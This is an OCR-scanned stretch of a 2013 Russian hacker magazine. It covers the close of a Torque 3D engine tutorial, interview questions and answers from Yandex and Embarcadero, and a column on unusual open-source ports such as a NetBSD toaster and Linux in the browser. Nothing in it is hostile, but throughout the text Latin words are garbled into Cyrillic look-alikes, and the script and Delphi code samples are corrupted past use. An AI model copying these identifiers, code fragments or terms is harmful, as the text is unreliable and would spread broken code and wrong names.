справа (вкладка ЫЬгагу) необходимый компонент 
или перетаскиваем его на активную область сле- 
ва. Затем, выбрав компонент и открыв вкладку 
СІІІ, получим список его свойств, которые не- 
посредственно можно изменить. Сохранение 
настраиваемого интерфейса осуществляется 
в меню Рііе. 

Файлы миссии и интерфейса представляют 
собой читаемые АЗСІІ-файлы, которые можно 
редактировать, не загружая редакторы, хотя это 
не лучший вариант. Между тем, когда игра уже 
будет готова к распространению, эти текстовые 
файлы можно легко преобразовать в двоичный 
формат. 

ТОЯСШЕ 30: СКРИПТИНГ 

Один из самых значительных компонентов движ- 
ка Тощие ЗЭ, бесспорно, скриптовый язык Тощие 
Зсгірі. Этот язык предназначен для описания 
игровой логики, геймплея и других сущностей, 
таких как миссии, пользовательские интерфейсы 
и так далее. Хотя он удобен для реализации гейм- 
плейных тасков, необходимо воздерживаться 
от решения на нем сложных, требующих продол- 
жительных вычислений задач, поскольку испол- 
нение кода на Тощие Зсгірі: в 50 раз медленнее 
исполнения кода на С++. Но это ни в коей мере 
не должно ограничивать использование языка 
в правильном русле. В то же время скриптовый 
код в других движках выполняется приблизитель- 
но с такой же скоростью. 

Тощие Зсгірі: — язык с динамической типи- 
зацией (РНР, РуІЬоп, ВиЬу), синтаксис унасле- 
дован от С, подобно абсолютному большинству 
других более-менее современных языков про- 
граммирования. Управляющие средства в нем 
содержатся такие же, как в С/С++. Вместе с этим 
Тощие Зсгірі: гораздо проще своих прародите- 
лей. Нет широкого диапазона типов данных, есть 
только строка и число и, соответственно, легкое 
преобразование между двумя типами, автомати- 
ческое управление памятью. Тем временем даже 
на таком «безобидном» языке можно написать 
код, который будет заваливать всю игру до кри- 
тической ошибки и вылета. 

В отличие от С++, здесь нет структур и клас- 
сов, зато есть датаблоки, которые играют по- 
хожую роль. Они не могут содержать функции, 
только переменные. С другой стороны, датабло- 
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Торкает на отлично! 
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Рис. 5. Лес, созданный с помощью Рогезі ЕсШог 




Рис. 6. Персонаж в ЗИаре ЕсШог 



ки могут наследоваться. Датаблоки — серверные 
объекты и после создания не могут быть удалены 
или изменены. Главным образом они использу- 
ются для создания объектов и инициализации 
их переменных-членов значениями собственных 
атрибутов. Приведу пример определения унас- 
ледованного датаблока: 

сІаІіаЫоск р1ауегЫотапРа1:а<-< 
(Ре-Раи11:1лІотапРа1=а : РІаѵегРаІіа’) { 
гепсІегРігзІіРепБОп = Іігие; 
сІаББМате = рІаѵегЫотапАгтог ; 
БІіареРіІе = "аг1:/5Ііаре5/аѵа1:аг5/<-< 
рІаѵегЫотап/ыотап.сІІіБ" ; 

// еііс... 

Датаблок в скриптовом коде всегда является 
отражением одноименной структуры в коде движ- 
ка на С++. РІауег\Л/отапЭа1:а — это структура в С++ 
коде, на основе которой будет создан датаблок 
ЭеІдиКѴѴотапЭаІв, значения для него будут унас- 
ледованы от датаблока РІауеЮаІв. Наследуемый 
датаблок должен быть создан также от структуры 
рІауегѴѴотапЭаІа. Хотя наследование датаблоков 
используется весьма редко, в некоторых случаях 
оно может быть удобным решением. Внутри ко- 
мандных скобок присутствуют операторы иници- 
ализации атрибутов датаблока. В данном случае 
мы создаем блок данных для аватара: задаем ре- 
жим отображения персонажа при виде от первого 
лица, указываем скриптовый класс, путь и файл, 
откуда надо загрузить модель, которая будет 
представлять аватар. Далее следует огромное 
число разных свойств (документация в помощь). 

Объект создается посредством следующего 
кода: 

%р1ауег = пей? АІРІауепП { 

сІаТаВІ оск = %Ыоск; 

шапкеп = %оЬі; 

■Роѵ = %1=етрР0Ѵ; 

1=еат = %1=етрТеат; 

/ / е1=с... 

ц_ 

Этот блок кода создает персонаж класса 
АІРІауег, инициализирует некоторые его свой- 
ства и сохраняет дескриптор созданного объекта 
в локальной переменной %рІауег (глобальная пе- 
ременная имела бы вид$рІауег). Если в конструк- 
тор передать параметр, то он станет именем объ- 
екта: %рІауег = пе\л/АІРІауег(топз1:ег1) {... }. Чтобы 
добиться такого же результата, можно присвоить 
строковый идентификатор свойству пате внутри 



командных скобок. Объекты могут создаваться 
и разрушаться в течение всего жизненного цикла 
игры. 

ТОГНШЕЗО:ПУСК 

Теперь, когда мы обсудили ключевые механизмы, 
мы можем глубже окунуться в движок, чтобы уви- 
деть, как он работает. После запуска экзэшника 
управление передается в файл таіп.сз, находя- 
щийся в корневой папке игры — дате. Код в этом 
файле осуществляет основную инициализацию 
движка: устанавливает значения глобальным 
переменным, отображает зріазіл-окно, создает 
канву на главном окне, парсит параметры ко- 
мандной строки, ищет и исполняет таіп-файлы 
в дочерних папках. В них содержатся подклю- 
чение (ехес) других скриптов и вызовы функций 
инициализации клиента и сервера. Таким же 
образом подключаются и загружаются пользо- 
вательские интерфейсы, которые подгружают 
текстуры для вывода на поверхностях гуи -эле- 
ментов. Вместе с этим загружаются редакторы. 

Во время создания сервера в функцию, ко- 
торая этим занимается, — СгеаІеЗегѵег в каче- 
стве параметра передается тип создаваемого 
сервера — для одного игрока (локальный) или 
многопользовательский. В первую очередь мы 
заинтересованы в создании мультиплеерных 
игр, следовательно, будем обсуждать этот вари- 
ант. И в этом случае происходит открытие порта 
28000. Затем управление передается в функцию 
загрузки уровня/миссии ІоасІМіззіоп. На первом 
этапе она с помощью функции ЬиіІсІІ_оасІІпТо чи- 
тает переданный ей файл миссии и отправляет 
его подключенному клиенту (миссия передается 
клиенту одновременно с запуском сервера толь- 
ко в случае сингл плеерной игры). На втором эта- 
пе посредством вызова ІоасІМі55іоп31:аде2 опре- 
деляется значение СВС, которое впоследствии 
используется для проверки целостности файла 
миссии на сервере и клиентах. 

После того как миссия загрузится на сер- 
вере и будет передана клиенту, он начнет ее 
загружать. Если сервер уже запущен (самый 
распространенный случай в мультиплеерной 
игре) и к нему подключится клиент, то снача- 
ла на сервере проверяется возможность при- 
нять еще одно подключение (в функции Сате 
Соппес1:іоп::опСоппесШедие5І:). Если сервер 
готов к подключению, клиенту возвращается 
пустая строка "" и он продолжает процедуру 
подключения, вызывая серверную функцию 
СатеСоппес1:іоп::опСоппесТ Она высылает кли- 
енту инфу о запущенной в данный момент мис- 
сии, устанавливает клиенту значения свойств 



по умолчанию (раса, пол, имя и так далее), со- 
общает присутствующим на сервере игрокам 
о новеньком и отсылает эти же данные под- 
ключившемуся клиенту. Затем она увеличивает 
счетчик клиентов и запускает загрузку миссии. 
Этот процесс логически поделен на три этапа, 
их смену можно отследить на экране прогресса 
загрузки на клиенте. Первым делом клиенту бу- 
дут переданы датаблоки. Это довольно быстрый 
этап даже с большой миссией. На втором этапе 
передаются динамические объекты и их свой- 
ства. На большом уровне, включающем много 
объектов, этот этап может быть долгим. Когда 
он завершится, сервер добавляет нового плеера 
в тусовку к остальным; при этом на клиенте за- 
пускается игра. 

ПЛАНЫ НА БУДУЩЕЕ 

Мы рассмотрели процесс запуска игры «с высо- 
ты птичьего полета», не углубляясь доскональ- 
но в вызовы и построчное выполнение каждой 
функции, потому что это заняло бы слишком 
много журнального пространства. На сегодня 
оно исчерпано. Мы обсудили историю и разви- 
тие движка Тогдие ЗЭ, создали свой проект, разо- 
брались с редакторами, включенными в движок, 
прикоснулись к скриптовому языку Тогдие Зсгірі: 
и под занавес статьи окунулись в код и выяснили 
принципы работы Торка. 

Тогдие ЗЭ — мощный игровой движок, кото- 
рый прекрасно подходит для решения как игро- 
вых, так и других практических задач. Его можно 
использовать в образовательных, архитектур- 
ных, машиностроительных целях и везде, где 
необходима высококачественная визуализация 
в реальном времени. Например, сейчас, когда 
Тогдие ЗЭ стал открытым, СагадеСаплез сотруд- 
ничает с разными образовательными заведени- 
ями — движок выступает в качестве наглядного 
пособия и/или инструмента в обучающих про- 
граммах. 

Думаю, что ставить точку еще рано, ведь нам 
надо еще так много обсудить в Тогдие ЗЭ и в кон- 
це концов разработать свою мультиплеерную 
игру. Для этого в будущем мы поговорим: о мо- 
дификации скриптов, создании новых персо- 
нажей, искусственном интеллекте, построении 
уровней, добавлении оружия, работе с движ- 
ком в С++ коде и многом-многом другом. Бу- 
дем надеяться, редактор пойдет нам навстречу 
и одобрит пару-тройку статей по Тогдие ЗЭ (еще 
ТРИ статьи по одному движку? Только не это! — 
Прим. ред.). 

Удачи во всех делах и до встречи на страни- 
цах журнала! ІТЕ 
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ЗАДАЧ ИНА 
СОБЕСЕДОВА 






РЕШЕНИЕ ЗАДАЧ ОТ ЯНДЕКСА ИЗ ПРЕДЫДУЩЕГО НОМЕРА 



ВОПРОС ПРО ПАЮ 

Классический вопрос про то, что такое РАЮ 10 
и РАЮ 0+1. Обычно мы спрашиваем, в чем раз- 
ница, какой из них лучше и почему. 

Ответ на этот вопрос — РАЮ 10 лучше. В слу- 
чае с четырьмя дисками в массиве при выходе 
из строя одного диска нагрузка перейдет на со- 
седний в паре. В случае РАЮ 0+1 если выходит 
из строя один диск, то из строя выходит целый 
страйп, а значит, соседние диски будут более на- 
гружены. Время синхронизации после замены 
вышедшего из строя диска в РАЮ 10 в два раза 
меньше, чем в РАЮ 0+1. И кроме того, РАЮ 10 
более надежен. Вероятность выхода из строя 
массива РАЮ 10 на четырех дисках при вышед- 
ших из строя любых двух — 33%, а в случае РАЮ 
0+1 — 66 %. 

ВОПРОС ПРО СЕТИ 

Два приложения в разных дата-центрах обмени- 
вались данными по протоколу прикладного уров- 
ня, использующему в качестве транспорта про- 
токол ТСР по выделенному каналу с пропускной 
способностью 10 СЬрз. Природа приложения та- 
кова, что данные сначала накапливаются в боль- 
шом количестве, а потом прикладным уровнем 
передаются с максимальной интенсивностью. 
При этом максимальная наблюдаемая скорость 
передачи данных между ними не превышала 200 
Кб/с. После перемещения серверов, на которых 
работают эти приложения, в один дата-центр 
скорость передачи данных возросла на порядки. 
Предложите объяснения этому. Что можно было 
бы предложить для исправления ситуации до 
переезда серверов? 

Вариантов ответа на этот вопрос несколько: 

• Потеря пакетов на канале. Необходимо 
провести стандартную диагностику (ріпд, 
ошибки на сетевых интерфейсах и так да- 
лее) — если предположение верное, то тре- 



буется локализация причины потерь пакетов 
и ее устранение. 

• Возможно, канал между дата-центрами 
является І_РМ (Іопд Таі пеіѵѵогк). Если на 
серверах не поддерживается (что в 2013 году 
сомнительно) или не включено использова- 
ние опции ѵѵіпбоѵѵ зсаіе протокола ТСР (ПРО 
1323), то максимальное окно не может пре- 
вышать 65 535 байт, что существенно меньше 
произведения РЛТ и пропускной способности 
канала. Максимальная скорость в такой кон- 
фигурации не будет превышать 65 535/РІТТ 
байт/с. Необходимо проверить, что эта опция 
включена, и если это не так — включить ее. 

ВОПРОС ПРО СЕРТИФИКАТЫ 
Протокол НТТРЗ сейчас получает все большее 
распространение и популярность. Вот типичный 
вопрос про сертификаты. 

На 1 .2.3.4: 443 отвечают три сайта: 

• ТогЬагф; 

• Тоо.ес; 

• Ьаг.ад 

по протоколу НТТРЗ. 

Сколько должно быть сертификатов для этих 
веб-сайтов и что должно в них быть прописано 
согласно РРС, чтобы браузеры могли им дове- 
рять? 

Вариантов ответа на этот вопрос два: 

• сертификат должен быть один, и все три хо- 
ста должны быть описаны в Х509ѵЗ ЗиЬіесІ: 
АКегпайѵе Мате; 

• можно сделать несколько разных сертифика- 
тов, если клиенты поддерживают ЗІЧІ. 

СОВСЕМ ПРОСТОЙ ВОПРОС ПРО ВА8Н 

Как инкрементировать (увеличить на единицу) 
переменную «а» в Ьазіі? 

Варианты ответа на этот вопрос: 



• Іе* а=а+1 

• а='ехрг $а + 1' 

КАКАЯ УТИЛИТА ПОЗВОЛЯЕТУЗНАТЬ 
НАЗВАНИЯ БИБЛИОТЕЧНЫХ ФУНКЦИЙ, 
ИСПОЛЬЗУЕМЫХ ПРОГРАММОЙ 
В ПРОЦЕССЕ ИСПОЛНЕНИЯ? 

Вариантов ответа, как обычно, много, например, 
один из них — Іітасе. 

КЛАССИЧЕСКИЙ ВОПРОС 
Расскажите, как происходит процесс загрузки 
Ыпих от включения компьютера. Просим расска- 
зать про стадии загрузчика на х86, что такое іпф 
как он создается и зачем он нужен, про ирзѣагі:/ 
зузіетсі — какие у них принципы работы и в чем их 
преимущества перед обычными іпіі-скриптами. 

Ответ на этот вопрос можно найти во всех 
учебниках для системных администраторов, так 
что мы решили его тут не публиковать :). 



МЫ ЖДЕМ ВАШИХ 
ЗАДАЧЕК! 

ІТ-компании, шлите нам свои задачки! 
Интересные и оригинальные задачки 
мы совершенно безвозмездно поста- 
вим перед нашими читателями. 

Достаточно просто написать 
на І 020 ѵзкѵ@аІс.ги и установить близкий 
контакт третьей степени с редактором 
рубрики. Вы шлете задачки, мы их 
публикуем. Взаимовыгодно! Да, и про 
бонусы читателям-решателям не за- 
бывайте! 
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Задачи на собеседованиях 



П 3 



НОВАЯ ПАРТИЯ ВОПРОСОВ: КОМПАНИЯ ЕМВАКСАОЕКО 

(ЭТО КОТОРАЯ С++В1ЛШЕР® ХЕ4, РАО 8ТІЮІ0 ХЕ4 И ЭЕІ.РНІ® ХЕ4 ДЕЛАЕТ) 



ДАН КОД, СРАБАТЫВАЮЩИЙ ПРИ НАЖА- 
ТИИ НА КНОПКУ: 



рпосесіипе ТРопт1.Ви1:1:оп1С1іск<-< 
(Бепсіеп: ТОЬіесЕ); 

Гі«§|ЁІШ':л & ' ^ 

±гу 

Й§у „ , . . 

5~ЕгТоіітЕ( 1 Боте питЬеп'Ѵ. 
БПомМеББа^еС 1 1 1 ) ; 

ехсері: 

5ІіоыМе5 5а§е( ' 2' ) ; 

епсі; 

Я паііѵ 

5ІіоыМе55а§е( ' 3 ' ) ; 

епсі ; 

$ІіоыМе55а^е( '4' ) ; 

ІИЙЙд ** ь' 4 #" _ 



Какие цифры увидит пользователь программы? 

ДАН КОД: 



А = с Іа б 5 

риЬІіс 

рпосесіипе Рип; 

епсі; 

В = сІаззСА) 

риЫіс 

рпосесіипе Рип; 
епсі; 



рпосесіипе А. Рип; 
Ье%іп 

БЬомМезБа^еС 'А' ) ; 
епсі; 



рпосесіипе В. Рип; 
Ье^іп 

$ІіоыМе55а§е( 1 В 1 ) ; 
епсі ; 

//... 



не-РА ; А; 
не-РВ ; В; 

Ье§іп 

не-РА ;= В.СпеаІіе; 



пе-РВ ;= не-РА; 

пе-РА. Рип; 

пе-РВ. Рип; 

//... 

епсі; 

• В какой строчке кода будет ошибка компиля- 
ции? Каким способом (способами) можно ее 
исправить? 

• В случае исправления и успешного запуска ка- 
кие буквы увидит пользователь? 

• Какие изменения нужно внести в код классов, 
чтобы пользователь увидел два раза букву В? 

ДАН КОД: 

ІМѵІпІіеп-Расе = Іпііеп-Расе 

епсі ; 

ТМѵСіэбб = с1а55(ТІп~Ееп-РасесЮЬіес1:. <-■ 

ІМѵІпІіеп-Расе^ 



сІеБІшисІіоп РеБІшоѵ; 

епсі ; 



сІеБІшисІіоп ТМѵСіэбб .РеБІшоѵ; 

Ье^іп 

ЗІіоыМеББа^еС 'беБ-рписРоп' ) ; 
епсі ; 



рпосесіипе ТРопшІ.ВиІіІіопІСІіскРБепсІеп: <-■ 

ТОЬіесЕ) ; 

ѵап 

іп-р ; ІМ ѵІпІіепТасе; 

Ье§іп 

іп-Р ;= ТМѵСіэбб. С пеаііе; 
епсі; 

Что нужно изменить в коде, чтобы при нажа- 
тии на кнопку пользователь увидел сообщение 
со словом «сІезЕгисЕог»? 

ДАН КОМПОНЕНТ ТАВІ.Е1 :ТТАВІ_Е 
С ЦЕЛОЧИСЛЕННЫМ ПОЛЕМ «Ю». КАКИЕ 
СТРО КИНЕ БУДУТ КО М П И Л И РО ВАТЬСЯ? 

1. ТаЬІеІ. ГіеІсІВуІМатеГ ' ісі ' ^ .Ѵаіие := <-■ 
10 ; 



2. ТаЬІеІ. Ріе1сІВуІМате( ' ісі ' ) .Ѵаіие ;= <-■ 
Чеп ' ; 

3. ТаЬІеІ. РіеІсІВѵІМатеГ ' ісГ ^ .Азіпііе^еп <-■ 
:= 10 ; 

4. ТаЬІеІ. РІеІсІБ [Ѳ] .АбБііпіп^ : = 10; 

5. ТаЬІеіГісГ] := 10; 

6. ТаЬІеІ [' ісі 1 ] ;= Чгеп'; 

7_„ ТаЬІеІ . РІеІсІБ [ 'ісі' ] : = Чеп'; 

8. ТаЬІеІ. РІеІсІБ [' ісі ' ] ;= 10; 

9. ТаЬІеІ. РІеІсІБ. РіеІсІВѵІМатеР ' ісГ ) .«-■ 
Аб51:піп§ := 10; 

10. ТаЬІеІ. РіеІсІБВѵІсК ' ісі ' ) .Ѵаіие ;= 10; 

11. ТаЬІеІ. РІеІсІБ . РіеІсІВѵІМатеР ' ісі ').<<-» 
АБІ пІіе^еп : =10; 

ЗАДАЧА НА ЗНАНИЕ БАЗОВЫХ 
АЛГОРИТМОВ 

Дан массив, содержащий ссылки на объекты 
типа «кнопка». Каждая кнопка имеет координаты 
верхнего правого угла (І_еИ, Тор), а также ширину 
и высоту (ѴѴісШл, НеідЫ). Необходимо разработать 
функцию, задающую размещение кнопок на фор- 
ме. Кнопки должны располагаться вплотную друг 
к другу и не выходить за размер формы. Учесть 
вариант, когда все кнопки не умещаются в один 
ряд. 

«ГЕОМЕТРИЧ ЕСКАЯ » ЗАДАЧА 
Заданы три точки координатами хі, уі, х2, у2, хЗ, 
уЗ. Определить, попадает ли точка с координата- 
ми х и у в треугольник, образованный исходными 
точками. Если решение задачи заняло меньше 
десяти минут (вместе с реализацией в коде), то 
распространить на трехмерный случай и про- 
странственное задание четырех точек. 

« ПРИКЛАДНАЯ » ЗАДАЧА 

Даны два отряда боевых юнитов. Первый состоит 
из существ А, каждое из которых обладает защи- 
той сП , здоровьем М и атакой аі . Для существ Б 
параметры задаются значениями 62, Ь2 и а2. Из- 
вестно, что при боевом взаимодействии между 
отрядами здоровье существ уменьшается прямо 
пропорционально атаке и обратно пропорцио- 
нально защите. Создать программу расчета ис- 
хода боя при условии, что существа А атакуют 
первыми существ Б, причем все атакуют всех. НС 



ПРИЗ ЗА РЕШЕНИЕ ЗАДАЧ ОТ ЕМВАКСАОЕКО 

Победитель получает ОеІрЬі ХЕ4 АгсЫЕесЕ. Тот самый, который стоит больше нимает Федор Усаков на почту: изакоѵ@Ьсот.ги . К ответам прилагай следу- 
100К ПШ ;). Спеши оказаться первым, но отвечай подробно, объясняя и обо- ющую информацию: полное ФИО, етаіі, город проживания, рабочий статус 

сновывая свои ответы — это повысит твои шансы! Правильные ответы при- (студент, программер, РМ и так далее) и название компании, если есть. 



ЧИТАТЕЛЬ - РЕШАТЕЛЬ ЗАДАЧКИ ОТ «ЛАБОРАТОРИИ КАСПЕРСКОГО» 

Едог СЬеЬоіагеѵ ( зекШ8@дтаіІ.сот ) устройства останется гореть до перезагрузки, а если обновление случи- 

лось в спящем режиме при уже выключенном экране, то обновление может 
Решил Егор задачку для разработчиков мобильного ПО от Лаборатории (пра- не произойти, поскольку ѴѴакеЬоск не выставлен. 

вильное решение — в прошлом номере), да забыл про кое-какие нюансы: За старания вместо ключей от автомобиля РогзсЬе Рапаплега он получает 

его программа не освобождает ѴѴакеІ_оск, то есть после обновления экран утешительный приз: ключик для Казрегзку Іпіегпеі ЗесигіЕу. 




"7 



ІІпіхоШ 
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Рассказ о самых 
необычных 

и странных событиях , 
произошедших в мире 
открытого ПО 




X 

▼ 

Евгений Зобнин 

ехесЬіІ.ш 



этот 

БЕЗУМНЫЙ, ■ 
БЕЗУМНЫЙ ^ 

ОРЕЫ ЗОІІПСЕ 



ЦКІІХ и Ореп Зоигсе когда-то выросли из идей, казавшихся 
безумными даже их прародителям, Ыпих появился 
в результате эксперимента, В50 — следствие увлечения 
студентов. Очень многое в мире Ореп Зоигсе — случайность 
и порождение проб и ошибок. А какие безумные идеи 
и эксперименты можно встретить сегодня? 



РАБОТАЕТ ДАЖЕ НА ТОСТЕРЕ 

До начала повсеместной экспансии Ыпих на все 
мыслимые и немыслимые устройства пальму 
первенства среди самых портируемых ОС уве- 
ренно занимала ІЧеІВЗР. Ее можно было уста- 
новить на практически все существующие и хоть 
сколько-нибудь популярные компьютерные си- 
стемы, включая даже такие ископаемые, как ма- 
шины на базе процессора Моіогоіа 68000. Однако 
наибольшую известность получил порт системы 
на тостер. 

В 2005 году компания ТесИпоІодіс Зузіеплз 
представила миру первый полностью рабочий 
тостер на базе ЫеіВЗО. В его основе лежал одно- 
платный компьютер их собственного производ- 
ства Т5-7200 с АВМ-процессором на 200 МГц 



и 32 Мб оперативной памяти (продается до сих 
пор, кстати), а с внешней стороны располага- 
лись четырехстрочный І_СО-дисплей, ІІЗВ-порт 
для подключения клавиатуры, порт ЕіИегпеі и по- 
следовательный порт для подключения консоли. 

Находящийся внутри компьютер включал 
в себя полноценную инсталляцию ЫеІВЗР с пред- 
установленными веб-сервером АрасНе, РНР, 
а также набором ССІ-скриптов для удаленного вы- 
полнения различных операций, таких как проигры- 
вание аудио через ІІЗВ-аудиосистему, управление 
ЮО-экраном и так далее. К сожалению, компо- 
ненты, отвечающие за приготовление тостов, так 
и остались механическими, поэтому включить 
процесс приготовления удаленно с помощью 55Н 
было нельзя. Зато тостер умел вести статистику 



по приготовленным тостам и автоматически за- 
пускать задачи в начале и по окончании поджарки. 

ОС В БРАУЗЕРЕ 

Кроме тостеров и прочего экзотического железа, 
не так давно ЫеІВЗР прославилась еще одним 
необычным портом. На этот раз систему запу- 
стили в браузере, не используя никаких плагинов 
и прочих костылей. Все ядро системы, а также не- 
сколько драйверов и утилит пространства поль- 
зователя было транслировано в набор скриптов 
на языке иаѵаЗсгірІ, которые можно запустить 
в любом браузере. 

Осуществить такое удалось благодаря на- 
личию в ядре ЫеІВЗй слоя абстракции ВІІМР 
(ВиппаЫе ІІзегзрасе Меіа Ргодгапл), который 
представляет собой прослойку над железом 
в стиле гипервизора или этакого микроядра. 
ВЫМР позволяет выносить части ядра или все 
ядро целиком в пространство пользователя, от- 
куда они смогут получать доступ к гипервизору 
с помощью специального АРІ. 

Чтобы перенести ядро в браузер, разработ- 
чики ІЧеІВЗО взяли код ВІІМР- ядра, примени- 
ли к нему транслятор Етзсгіріеп для перевода 
на язык иаѵаЗсгірІ, а затем реализовали на том 
же ОаѵаЗсгірІ: минималистичный гипервизор, под 
управлением которого и запустили ВІІМР-ядро. 



ХАКЕР 08 /175/ 2013 



”5 




В ^ѵаЗсгірі также были транслированы неко- 
торые драйверы файловых систем (РР5, Тплрі'з 
и кегпТз) и несколько утилит командной строки. 
Все это уместилось в 5 Мб и может быть проте- 
стировано в любом браузере по этой ссылке: аоо. 
аІ/г572С . 

Несмотря на экспериментальный характер 
проекта, он имеет вполне себе утилитарные цели. 
Одно из применений такого ядра разработчики 
видят в том, чтобы позволить веб-приложениям 
выполнять сложные функции, ранее присущие 
только операционным системам. Например, 
с помощью такого ^ѵаЗсгірІ-ядра можно легко 
реализовать веб-приложение, позволяющее на- 
прямую работать с образами файловых систем 
без необходимости запускать какие-либо про- 
цессы на серверной стороне. 

ОаѵаЗсгірі-ядро уже включено в официальный 
список портов ІЧеШЗЭ и располагается в каталоге 
зуз/агсіі/іаѵазсгірі:. Конец І386 близок как никогда. 

КОМП В БРАУЗЕРЕ 

Но зачем ограничиваться одним ядром, когда 
в браузер можно запихнуть весь компьютер, 
а точнее, его виртуальный аналог? Именно это 
сделал неугомонный математик, а по совмести- 
тельству автор эмулятора О ЕМ II и медиапакета 
РРплред Фабрис Беллар. Исключительно ради 
проверки текущих возможностей 38, а также соб- 
ственных скиллов он сел и начал реализацию бра- 
узерного эмулятора ПК с нуля. 

В результате появился удивительно быстрый 
эмулятор, способный загрузить Ііпих-2.6.20 с вир- 
туальной файловой системой, содержащей прак- 
тически все стандартные команды І_іпих, букваль- 
но за несколько секунд (8,478 в СІіготе 28, если 
быть точным). Причем, по заявлению Беллара, 
ЗаѵаЗсгірІ: позволил реализовать некоторые опти- 
мизации, отсутствующие в ОЕМІІ, и таким обра- 
зом в некоторых местах добиться более высокой, 
в сравнении с тем же ОЕМІІ, производительности. 

Во всем остальном возможности эмулятора 
довольно стандартные: набор инструкций І486, 
эмуляция сетевой карты и текстового видео- 
адаптера. Поддержка дисковых накопителей пока 
не реализована, как и поддержка сопроцессо- 
ра и наборов инструкций ММХ, ЗЗЕ. Однако все 
это не мешает работе І_іпих, благодаря наличию 
в ядре эмулятора сопроцессора и поддержки 
виртуальных дисковых накопителей в памяти. 

Полюбоваться работой этого чуда програм- 
мистской мысли можно на странице автора 
( ЬеІІагсІ.ога/ізІіпих ). Сразу после входа начнет- 
ся загрузка эмулятора, в конце которой выпадет 
консоль и станут доступны редакторы ѵі и цепласз, 
компилятор Ісс, сетевые серверы сіпзсі, пірсі, Ирб, 
НйрсІ, зепсітаіі и многое другое. 



Тостер под управлением ЫеіВЗО 



ОС ДЛЯ КАЛЬКУЛЯТОРА 

Если полноценный ІІІМІХ в браузере тебя не впе- 
чатлил, то как насчет ІІІМІХ’а в калькуляторе? ТІ- 
92+ — программируемый калькулятор для серьез- 
ных математиков, начинка его равна среднему 
компу примерно 30-летней давности: процессор 
на 12 МГц, 256 Кб оперативной памяти, 2 Мб по- 
стоянной, плюс полноценная ОѴѴЕПТУ-клавиатура 
и растровый экран с разрешением 240 х 128. Ра- 
ботает под управлением собственной минима- 
листичной ОС и позволяет выполнять множество 
самых разнообразных математических операций. 

Полноценную ІМеІВЗЭ или І_іпих в него не впих- 
нешь, ввиду уж слишком ограниченных ресурсов, 
а вот стороннюю минималистичную ОС вполне. 
Этой возможностью и решили воспользоваться 
энтузиасты, создавшие Рипіх — ІІІМІХ-подобную 
ОС для ТІ-92+. Система, кстати говоря, для столь 
ограниченных ресурсов получилась очень даже 
неплохая. Поддерживается вытесняющая много- 
задачность, виртуальные терминалы, органи- 
зация прямой связи с внешним ПК или другим 
калькулятором через порт ввода-вывода, вывод 
звука через /сіеѵ/аисііо. Доступны стандартные 



ІІМХ-утилиты: зИ, Іор, саі, Ігие, Таізе, сіеаг, ипапле, 
епѵ, ісі и баіе. 

Написана система почти целиком на языке 
Си и распространяется под лицензией ВЗЭ. Если 
у тебя есть возможность стать владельцем такого 
калькулятора, то я настоятельно рекомендую по- 
тестить операционку, скачав ( аоо.аІ/гиХШ ) и со- 
брав ее из исходников. 

УНИТАЗ СУДАЛЕННЫМ УПРАВЛЕНИЕМ 

Японцы — народ изобретательный и технически 
продвинутый. Они готовы автоматизировать, ро- 
ботизировать и компьютеризировать все, до чего 
только дотянутся их руки. И вот, после автомати- 
зации велопарковок, домов, автобусных станций 
и поездов, они добрались до самого ценного, 
что есть в доме, — туалета. Новые унитазы ли- 
нейки Зайз ( Ьіі.Іѵ/ЦТірІѵѵ ), выпускаемые япон- 
ской фирмой І_іхіІ, не только сделают всю грязную 
работу за тебя (в разумных пределах, конечно), 
но и позволят рулить унитазом удаленно, исполь- 
зуя АпсІгоісІ-приложение. 

І_іхіІ Заііз обладает всей функциональностью, 
которая только может понадобиться в умном уни- 
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Запускаем в браузере Ьіпих. . . 



...и более экзотичный ЫеіВЗО 






ІІпіхоШ 
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тазе. Это и регулировка температуры сиденья, 
и автоматический смыв, и закрытие крышки, и, 
конечно же, незаменимая функция проигрыва- 
ния музыки для максимального комфорта. Одна- 
ко, используя фирменное АпсІгоісІ-приложение, 
работающее с унитазом по протоколу ВІиеІооИп, 
ты получишь еще больший контроль над устрой- 
ством. Например, ты сможешь заблаговременно 
открыть крышку еще до входа в туалет, выбрать 
наиболее подходящую для данного момента му- 
зыкальную композицию и просмотреть журнал 
посещений уборной с подробной информацией 
о каждом событии. 

ПОРТ АЫОПОЮ НАС# 

Раз уж мы заговорили об АпбгоісІ, то нельзя 
не вспомнить и о довольно бесполезном начина- 
нии под названием ХоЬоЮЗ. В начале 2012 года 
компания Хатагіп, которая занимается поддерж- 
кой Мопо, инициировала проект по переписыва- 
нию всех Заѵа-компонентов АпбгоісІ на язык С# 
и, как следствие, замену виртуальной машины 
Эаіѵік на Мопо. В результате на свет появилась 
ХоЬоЮЗ, она же АпбгоісІ 4.0.3 с Мопо внутри, код 
которой был выложен в репозиторий и ни разу 
не менялся с тех пор. 

Интересно во всей этой истории то, что в ре- 
зультате вложения довольно значительных усилий 
в портирование системы каких-то существенных 
выгод, за исключением рекламы Мопо, разработ- 
чики не получили. Все, что осталось в итоге, — 
это внесенные доработки в инструмент ЗІіагреп, 
предназначенный для трансляции баѵа в С#, 
а также изменения в порте Мопо на Апбгоіб, кото- 
рый избавился от привязки к баѵа. 

Зато родился график, который очень красно- 
речиво показывает, насколько более эффективной 
стала система — производительность возросла 
более чем в шесть раз. Однако тест, его генериру- 
ющий, на поверку оказался полностью синтетиче- 
ским и не отражающим ровным счетом ничего. 

ГРАФИЧЕСКАЯ ПОДСИСТЕМА В ЯДРЕ 

Как известно, на определенном этапе проектиро- 
вания программисты, разрабатывающие ѴѴіпбоѵѵз 
І\ІТ, пришли к выводу, что в целях эффективности 
вся графическая подсистема ОС должна нахо- 
диться в ядре. В ІІМХ, с другой стороны, система 
X ѴѴіпбоѵѵ всегда была хоть и привилегированным, 
но пользовательским процессом, который об- 



ращался к ядру только с целью получить доступ 
к адресному пространству видеоадаптера. Такой 
подход считался неэффективным, поэтому раз- 
говоры о том, что І_іпих должен следовать по пути 
ѴѴіпбоѵѵз и тоже включать в ядро графическую си- 
стему, в какой-то момент стали самым популяр- 
ным занятием линуксоидов. 

Люди в теме прекрасно понимали, что на са- 
мом деле переносить всю графику в ядро 
ни в коем случае нельзя и что наряду с незна- 
чительным поднятием производительности мы 
получим массу самых разнообразных проблем, 
от раздувания ядра до уничтожения совмести- 
мости со всем существующим софтом. Однако 
для некоторых идея переноса графической систе- 
мы в ядро показалась интересной и правильной. 
В результате появился РгаплеЬиТТег III — оконная 
система, работающая внутри ядра и базирующа- 
яся на интерфейсе РгаплеЬиТТег (ТЬбеѵ), этаком 
